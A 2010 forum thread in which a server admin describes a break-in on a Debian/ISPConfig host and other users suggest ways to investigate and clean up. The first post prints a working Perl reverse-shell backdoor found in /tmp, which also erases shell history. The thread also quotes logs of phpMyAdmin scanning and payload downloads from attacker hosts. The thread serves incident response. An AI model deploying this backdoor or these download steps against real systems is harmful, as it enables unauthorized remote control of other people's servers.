Go Back   HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials > ISPConfig 3 > General

Do you like HowtoForge? Please consider supporting us by becoming a subscriber.
Reply
 
Thread Tools Display Modes
  #1  
Old 22nd September 2010, 01:09
jcombs_31 jcombs_31 is offline
Member
 
Join Date: Jan 2009
Location: South Florida
Posts: 83
Thanks: 2
Thanked 2 Times in 1 Post
Default Server Hacked

Noticed some issues with services down on my box and started looking through my logs. It appears that the machine has been hacked and I'm still trying to see if it is with a particular site or how they got in. I did find a file named back.txt that was just sitting in the /tmp directory.

Code:
#!/usr/bin/perl
use IO::Socket;
$system    = '/bin/bash';
$ARGC=@ARGV;
print "--== Fucking Machine ==-- \n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Spawning Shell \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== Thuraya Team ==--  \n\n";
system("unset HISTFILE; unset SAVEFILE; unset HISTSAVE; history -n; unset WATCH; export HISTFILE=/dev/null ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Uptime==--; w;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
I also see a lot of this in the logs

Code:
72.249.74.26 - - [20/Sep/2010:23:50:04 -0500] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 364 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:08 -0500] "GET /admin/scripts/setup.php HTTP/1.1" 404 346 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:14 -0500] "GET /db/scripts/setup.php HTTP/1.1" 404 343 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 348 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /mysql/scripts/setup.php HTTP/1.1" 404 346 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /mysqladmin/scripts/setup.php HTTP/1.1" 404 351 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 357 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /phpadmin/scripts/setup.php HTTP/1.1" 404 349 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 351 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:23 -0500] "GET /phpmyadmin2/scripts/setup.php HTTP/1.1" 404 352 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:23 -0500] "GET /pma/scripts/setup.php HTTP/1.1" 404 344 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:23 -0500] "GET /web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 355 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:26 -0500] "GET /web/scripts/setup.php HTTP/1.1" 404 344 "-" "ZmEu"
This seems to be a pretty common attack while searching the internet, but something seems to have clearly got access based on the file in tmp.

Here is where I found the reference to back.txt, looks like it was grabbed from FTP:

Code:
--10:18:55--  ftp://lifepark:*password*@61.220.169.154/.trash/robot.txt
           => `robot.txt'
Connecting to 61.220.169.154:21... connected.
Logging in as lifepark ... Logged in!
==> SYST ... done.    ==> PWD ... done.
==> TYPE I ... done.  ==> CWD /.trash ... done.
==> PASV ... done.    ==> RETR robot.txt ... done.

    0K .......... ......                                        25.11 KB/s

10:18:58 (25.11 KB/s) - `robot.txt' saved [17177]

kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
join: missing operand
Try `join --help' for more information.
sh: http://mysql.gwshack.us/back.txt: No such file or directory
sh: http://mysql.gwshack.us/back.txt: No such file or directory
--10:32:13--  http://mysql.gwshack.us/back.txt
           => `back.txt'
Resolving mysql.gwshack.us... 213.251.132.191
Connecting to mysql.gwshack.us|213.251.132.191|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 892 [text/plain]

    0K                                                       100%  121.53 MB/s

10:32:14 (121.53 MB/s) - `back.txt' saved [892/892]
This is a debian4 box that is updated along with the latest ISPconfig updates. One site is running wordpress which is also updated so I'm not sure where the vulnerability is.

Any suggestions on which direction to move at this point to look for holes and clean things up?

Last edited by jcombs_31; 22nd September 2010 at 01:56.
Reply With Quote
Sponsored Links
  #2  
Old 22nd September 2010, 14:23
falko falko is offline
Super Moderator
 
Join Date: Apr 2005
Location: Lüneburg, Germany
Posts: 41,701
Thanks: 1,900
Thanked 2,741 Times in 2,575 Posts
Default

First of all I'd run chkrootkit and rkhunter to see if there are any rootkits on your system. Then make sure that all your web applications (Wordpress, Joomla, etc.) are up to date.
__________________
Falko
--
Download the ISPConfig 3 Manual! | Check out the ISPConfig 3 Billing Module!

FB: http://www.facebook.com/howtoforge

nginx-Webhosting: Timme Hosting | Follow me on:
Reply With Quote
  #3  
Old 22nd September 2010, 18:16
till till is online now
Super Moderator
 
Join Date: Apr 2005
Location: Lüneburg, Germany
Posts: 36,083
Thanks: 826
Thanked 5,396 Times in 4,240 Posts
Default

Which user is the owner of /tmp/back.txt file?
__________________
Till Brehm
--
Get ISPConfig support and the ISPConfig 3 manual from ispconfig.org.
Reply With Quote
  #4  
Old 22nd September 2010, 23:59
jcombs_31 jcombs_31 is offline
Member
 
Join Date: Jan 2009
Location: South Florida
Posts: 83
Thanks: 2
Thanked 2 Times in 1 Post
Default

Found a lot of new files today in /tmp. The owner of all appears to be www-data

Code:
 ls -la
total 1400
drwxrwxrwt  8 root     root       4096 Sep 22 16:55 .
drwxr-xr-x 22 root     root       4096 Sep 21 21:08 ..
drwxrwxrwt  2 root     root       4096 Sep 21 21:08 .ICE-unix
drwxrwxrwt  2 root     root       4096 Sep 21 21:08 .X11-unix
drwxr-xr-x  2 www-data www-data   4096 Sep 22 14:44 .session
drwxr-xr-x  6 www-data www-data   4096 Mar 26 08:48 .svn
-rwxr-xr-x  1 www-data www-data   4834 Mar 26 08:48 Changelog
-rwxr-xr-x  1 www-data www-data   1361 Mar 26 08:48 README
-rwxr-xr-x  1 www-data www-data    308 Mar 26 08:48 THANKS
-rwxr-xr-x  1 www-data www-data     80 Mar 26 08:48 TODO
-rwxr-xr-x  1 www-data www-data   2429 Sep 22 14:42 a
-rwxr-xr-x  1 www-data www-data  36898 Sep  2 04:27 bfp
-rwxr-xr-x  1 www-data www-data  20887 Sep  2 04:27 bfr
drwxr-xr-x  5 www-data www-data   4096 Sep  2 04:27 bfr-1.6
-rwxr-xr-x  1 www-data www-data   2010 Mar 26 09:18 crack
-rwxr-xr-x  1 www-data www-data  65431 Sep  5 13:17 dictionar
-rwxr-xr-x  1 www-data www-data     18 Sep  6 12:15 email
srwx------  1 root     root          0 Sep 21 21:09 fail2ban.sock
-rwxr-xr-x  1 www-data www-data  12175 Mar 26 08:48 fphelper.py
-rwxr-xr-x  1 www-data www-data  12288 Mar 26 08:48 groupdb
-rwxr-xr-x  1 www-data www-data  36772 Mar 26 08:48 helper.py
-rwxr-xr-x  1 www-data www-data  36024 Mar 26 08:48 helper.pyc
-rwxr-xr-x  1 www-data www-data   1833 Mar 26 09:18 install
-rwxr-xr-x  1 www-data www-data    143 Mar 26 08:48 kill
-rwxr-xr-x  1 www-data www-data    568 Mar 26 09:18 lib.sh
-rwxr-xr-x  1 www-data www-data   4298 Mar 26 08:48 pptable.py
-rwxr-xr-x  1 www-data www-data   4998 Mar 26 08:48 pptable.pyc
-rwxr-xr-x  1 www-data www-data   4229 Mar 26 08:48 regen.py
drwxr-xr-x  2 www-data www-data   4096 Mar 26 08:48 results
-rwxr-xr-x  1 www-data www-data   1509 Mar 26 09:18 scan
-rwxr-xr-x  1 www-data www-data 512766 Sep  6 14:17 sip.tgz
-rwxr-xr-x  1 www-data www-data 110592 Mar 26 08:48 staticfull
-rwxr-xr-x  1 www-data www-data 282624 Mar 26 08:48 staticheaders
-rwxr-xr-x  1 www-data www-data    749 Mar 26 08:48 sv.xsl
-rwxr-xr-x  1 www-data www-data  22222 Mar 26 08:48 svcrack.py
-rwxr-xr-x  1 www-data www-data   9159 Mar 26 08:48 svlearnfp.py
-rwxr-xr-x  1 www-data www-data  24601 Mar 26 08:48 svmap.py
-rwxr-xr-x  1 www-data www-data  12852 Mar 26 08:48 svreport.py
-rwxr-xr-x  1 www-data www-data  26016 Mar 26 08:48 svwar.py
-rwxr-xr-x  1 www-data www-data   6152 Sep  2 04:27 timeout
-rwxr-xr-x  1 www-data www-data   1619 Mar 26 08:48 timeout.c
-rwxr-xr-x  1 www-data www-data  45056 Mar 26 08:48 totag
Take a look at the readme

Code:
cat README
Welcome to SIPVicious security tools.

The 4 tools that you should be looking at are:
 - svmap
 - svwar
 - svcrack
 - svreport


The tools:
svmap - this is a sip scanner. When launched against
ranges of ip address space, it will identify any SIP servers
which it finds on the way. Also has the option to scan hosts
on ranges of ports.

svwar - identifies working extension lines on a PBX. A working
extension is one that can be registered.
Also tells you if the extension line requires authentication or not.

svcrack - a password cracker making use of digest authentication.
It is able to crack passwords on both registrar servers and proxy
servers. Current cracking modes are either numeric ranges or
words from dictionary files.

svreport - able to manage sessions created by the rest of the tools
and export to pdf, xml, csv and plain text.

svlearnfp - allows you to generate new fingerprints by simply running
the tool against a host. It will attempt to guess most values and allow
you to save the information to the local fingerprint db. Then you can
choose to upload it to the author so that it can be added to the database.

For usage help make use of -h or --help switch.

Also check out the wiki:
http://code.google.com/p/sipvicious/w/list

And if you're stuck you're welcome to contact the author.

Sandro Gauci
sandrogauc at gmail dot com
Rkhunter isn't finding anything. System is always up-to-date, wordpress is newest version and only running on 1 site with suexec.
Reply With Quote
  #5  
Old 23rd September 2010, 00:25
juan_g juan_g is offline
Junior Member
 
Join Date: Sep 2010
Posts: 19
Thanks: 7
Thanked 1 Time in 1 Post
Default Fail2ban

Was the Fail2ban intrusion prevention framework installed? It's one of the recommended steps for ISPConfig (see The Perfect Server, page 4, #16 Install fail2ban).

On ISPConfig 3:

Monitor -> Logfiles -> Show fail2ban-Log

Last edited by juan_g; 23rd September 2010 at 00:30.
Reply With Quote
  #6  
Old 23rd September 2010, 01:25
jcombs_31 jcombs_31 is offline
Member
 
Join Date: Jan 2009
Location: South Florida
Posts: 83
Thanks: 2
Thanked 2 Times in 1 Post
Default

Yes, fail2ban is installed.

Looks like this is coming from japan, or at least the server the files were downloaded from. In /var/log/apache2/error.log I see

Code:
--14:41:25--  http://61.115.230.118/icons/sip.tgz
           => `sip.tgz'
Connecting to 61.115.230.118:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 512,766 (501K) [application/x-gzip]

    0K .......... .......... .......... .......... ..........  9%    8.68 KB/s
   50K .......... .......... .......... .......... .......... 19%    3.48 KB/s
  100K .......... .......... .......... .......... .......... 29%    7.66 KB/s
  150K .......... .......... .......... .......... .......... 39%    4.19 KB/s
  200K .......... .......... .......... .......... .......... 49%    5.63 KB/s
  250K .......... .......... .......... .......... .......... 59%    7.58 KB/s
  300K .......... .......... .......... .......... .......... 69%    7.43 KB/s
  350K .......... .......... .......... .......... .......... 79%    4.90 KB/s
  400K .......... .......... .......... .......... .......... 89%    8.46 KB/s
  450K .......... .......... .......... .......... .......... 99%   13.72 KB/s
  500K                                                       100%    1.31 MB/s

14:42:52 (6.22 KB/s) - `sip.tgz' saved [512766/512766]
Code:
 whois 61.115.230.118
[ JPNIC database provides information regarding IP address and ASN. Its use   ]
[ is restricted to network administration purposes. For further information,  ]
[ use 'whois -h whois.nic.ad.jp help'. To only display English output,        ]
[ add '/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'.      ]

Network Information:
a. [Network Number]             61.115.230.0/24
b. [Network Name]               AT-LINKNET
g. [Organization]               Link Incorporated
m. [Administrative Contact]     GO004JP
n. [Technical Contact]          YI1082JP
p. [Nameserver]                 dns1.atworks.co.jp
p. [Nameserver]                 ns02.idc.jp
p. [Nameserver]                 ns03.idc.jp
[Assigned Date]                 2001/04/12
[Return Date]
[Last Update]                   2005/04/14 18:59:04(JST)

Less Specific Info.
----------
Yahoo Japan Corporation
                     [Allocation]                              61.115.224.0/20

More Specific Info.
----------
No match!!
Reply With Quote
  #7  
Old 23rd September 2010, 08:28
matty matty is offline
Member
 
Join Date: Apr 2010
Location: Australia
Posts: 85
Thanks: 2
Thanked 12 Times in 11 Posts
Default

grep through your apache logs for words like wget, curl, tar, exec, perl, and so on. They will most likely be using a script vulnerability to download, unpack, and run the files. That should show up what is being exploited. Also manually scroll through the logs at around the time you see that those files were downloaded. That may also give you some hints.
Reply With Quote
  #8  
Old 23rd September 2010, 08:53
till till is online now
Super Moderator
 
Join Date: Apr 2005
Location: Lüneburg, Germany
Posts: 36,083
Thanks: 826
Thanked 5,396 Times in 4,240 Posts
Default

As the files are owned by www-data and rkhunter is not showing any problems, it might be that the hackers did not got root priveliges yet. There had been a few vulnerabilities in phpmyadmin in the last months and your log output shows that they serached for phpmyadmin, so it might be that they went in trough phpmyadmin.

You wrote above that this is a debian 4 system. I recommend that you update it to debian 5. There is a howto from falko available here at howtoforge that describes the debian 4 to 5 update procedure. before you update, remove phpmyadmin wth:

apt-get remove --purge phpmyadmin

and reinstall it after the update with:

apt-get install phpmyadmin. You should also remove all these files in /tmp and then check your server in the next days if you see any anomal behaviours or higher load. You can check your server also with a portscanner from a external other system to see if any ports are opened that you dont wanted to be open.
__________________
Till Brehm
--
Get ISPConfig support and the ISPConfig 3 manual from ispconfig.org.
Reply With Quote
  #9  
Old 25th September 2010, 20:37
e100 e100 is offline
Junior Member
 
Join Date: Sep 2010
Posts: 12
Thanks: 1
Thanked 5 Times in 1 Post
Default

Get time stamp of that entry in error log.
Then try to match the error to a request in the access log so you can see what page they exploited to make it download this sip.tgz.

Do the same thing with the file dates in /tmp
Match the creation times to requests in access log.


Quote:
Originally Posted by jcombs_31 View Post
Yes, fail2ban is installed.

Looks like this is coming from japan, or at least the server the files were downloaded from. In /var/log/apache2/error.log I see

Code:
--14:41:25--  http://61.115.230.118/icons/sip.tgz
           => `sip.tgz'
Connecting to 61.115.230.118:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 512,766 (501K) [application/x-gzip]


14:42:52 (6.22 KB/s) - `sip.tgz' saved [512766/512766]
Reply With Quote
  #10  
Old 2nd October 2010, 18:33
jcombs_31 jcombs_31 is offline
Member
 
Join Date: Jan 2009
Location: South Florida
Posts: 83
Thanks: 2
Thanked 2 Times in 1 Post
 
Default

Things have been ok since deleting all files that were downloaded. I went ahead and did an upgrage from etch to lenny today. The only concern I have is that it doesn't look like the kernel was upgraded.

Code:
uname -r
2.6.18-128.1.1.el5.028stab062.3
Any downside to using an older kernel? Debian version shows as lenny

Code:
cat /etc/debian_version
5.0.6
I'm just a little nervous about trying to upgrade the kernel on a remote system.
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
User unknown in relay recipient table Taxick Installation/Configuration 12 9th April 2013 12:31
Virtual Users And Domains With Postfix, Courier, MySQL And SquirrelMail -Ubuntu 8.04 c4rdinal HOWTO-Related Questions 112 23rd August 2011 10:49
Centos5.4/ISPConfig 3--Virtual site not working MichaelCaditz Installation/Configuration 25 25th March 2011 11:37
Random Questions dclardy General 9 3rd September 2009 23:39
Problem with keeping Apache alive bobeq Server Operation 3 29th November 2007 16:11


All times are GMT +2. The time now is 18:50.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.